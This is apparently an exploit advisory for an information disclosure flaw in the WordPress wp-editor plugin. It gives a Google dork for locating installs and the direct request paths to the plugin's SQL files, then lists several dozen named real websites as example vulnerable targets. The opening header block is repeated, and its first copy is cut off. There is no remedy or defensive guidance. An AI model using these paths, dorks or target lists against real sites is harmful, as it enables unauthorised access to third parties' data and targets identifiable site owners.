``` ################################################################################################# #Exploit Title : WordPress wp-editor Plugins Database Backup Information Disclosure Vulnerability #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army #Date : 19/11/2018 #Vendor Homepage : wordpress.org/plugins/wp-editor/ +github.com/CasaJasmina/website/tree/master/wp-content/plugins/wp-editor #Tested On : Windows and Linux #Category : WebApps #Google Dork : inurl:''/wp-content/plugins/wp-editor/'' #Software Download Link : downloads.wordpress.org/plugin/wp-editor.zip #Exploit Risk : Medium #CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] ################################################################################################# Admin Panel Login Path : /wp-login.php #################################################################################################...
``` ################################################################################################# #Exploit Title : WordPress wp-editor Plugins Database Backup Information Disclosure Vulnerability #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army #Date : 19/11/2018 #Vendor Homepage : wordpress.org/plugins/wp-editor/ +github.com/CasaJasmina/website/tree/master/wp-content/plugins/wp-editor #Tested On : Windows and Linux #Category : WebApps #Google Dork : inurl:''/wp-content/plugins/wp-editor/'' #Software Download Link : downloads.wordpress.org/plugin/wp-editor.zip #Exploit Risk : Medium #CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] ################################################################################################# Admin Panel Login Path : /wp-login.php ################################################################################################# Exploit : /wp-content/plugins/wp-editor/sql/database.sql /wp-content/plugins/wp-editor/sql/uninstall.sql /PATH/wp-content/plugins/wp-editor/sql/database.sql /PATH/wp-content/plugins/wp-editor/sql/uninstall.sql ################################################################################################# Example Vulnerable Sites => [+] symev.org/wp-content/plugins/wp-editor/sql/database.sql [+] minigolf.tondr.cz/wp-content/plugins/wp-editor/sql/database.sql [+] dacosta-dce.com/wp-content/plugins/wp-editor/sql/database.sql [+] quadax.com/wp-content/plugins/wp-editor/sql/database.sql [+] binquenais.com/wp-content/plugins/wp-editor/sql/database.sql [+] awdee.ru/wp-content/plugins/wp-editor/sql/database.sql [+] sctpn.net/1viralvoice/wp-content/plugins/wp-editor/sql/database.sql [+] freelancingintegral.com/wp-content/plugins/wp-editor/sql/database.sql [+] onerecourse.com/wp-content/plugins/wp-editor/sql/database.sql [+] smseafoodmarket.com/wp-content/plugins/wp-editor/sql/database.sql [+] dutchbikeshop.ie/wp-content/plugins/wp-editor/sql/database.sql [+] patriotservicesgroupint.com/wp-content/plugins/wp-editor/sql/database.sql [+] catholic.my/shc/wp-content/plugins/wp-editor/sql/database.sql [+] climatesavers.org/wp-content/plugins/wp-editor/sql/database.sql [+] frenchviewlifestylevillage.com.au/wp-content/plugins/wp-editor/sql/database.sql [+] asry.net/wp-content/plugins/wp-editor/sql/database.sql [+] hindaspace.com/wp-content/plugins/wp-editor/sql/database.sql [+] feq.pt/wp-content/plugins/wp-editor/sql/database.sql [+] ambalabakers.com/wp-content/plugins/wp-editor/sql/database.sql [+] makonsag.ca/test/wp-content/plugins/wp-editor/sql/database.sql [+] serranomanagement.com/wp-content/plugins/wp-editor/sql/database.sql [+] viajesyeventosrd.com/karinajeantonywedding/wp-content/plugins/wp-editor/sql/database.sql [+] yourmobilebroker.com.au/wp-content/plugins/wp-editor/sql/database.sql [+] arboretumparkconservancy.org/wp-content/plugins/wp-editor/sql/database.sql [+] strategydesign-corp.com/wpsandbox/wp-content/plugins/wp-editor/sql/database.sql [+] cofesa.co.za/wp-content/plugins/wp-editor/sql/database.sql [+] e-marcas.com.br/wp-content/plugins/wp-editor/sql/database.sql [+] sensesmart.com/ce/wp-content/plugins/wp-editor/sql/database.sql [+] patriotservicesgroupint.com/wp-content/plugins/wp-editor/sql/database.sql [+] fabulousaesthetics.com/beautyinsider/wp-content/plugins/wp-editor/sql/database.sql [+] mastudio.co.nz/2016/wp-content/plugins/wp-editor/sql/database.sql [+] optimalbd.com/wp-content/plugins/wp-editor/sql/database.sql [+] crkdesign.nl/wp-content/plugins/wp-editor/sql/database.sql [+] dallserve.com/wp-content/plugins/wp-editor/sql/database.sql [+] sportsmd.cl/wp-content/plugins/wp-editor/sql/database.sql [+] streetpromo.com.ng/wp-content/plugins/wp-editor/sql/database.sql [+] veritusgroup.com/wp-content/plugins/wp-editor/sql/database.sql [+] freshfaceaesthetictreatments.com.au/wp-content/plugins/wp-editor/sql/database.sql ################################################################################################# #Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ################################################################################################# ```
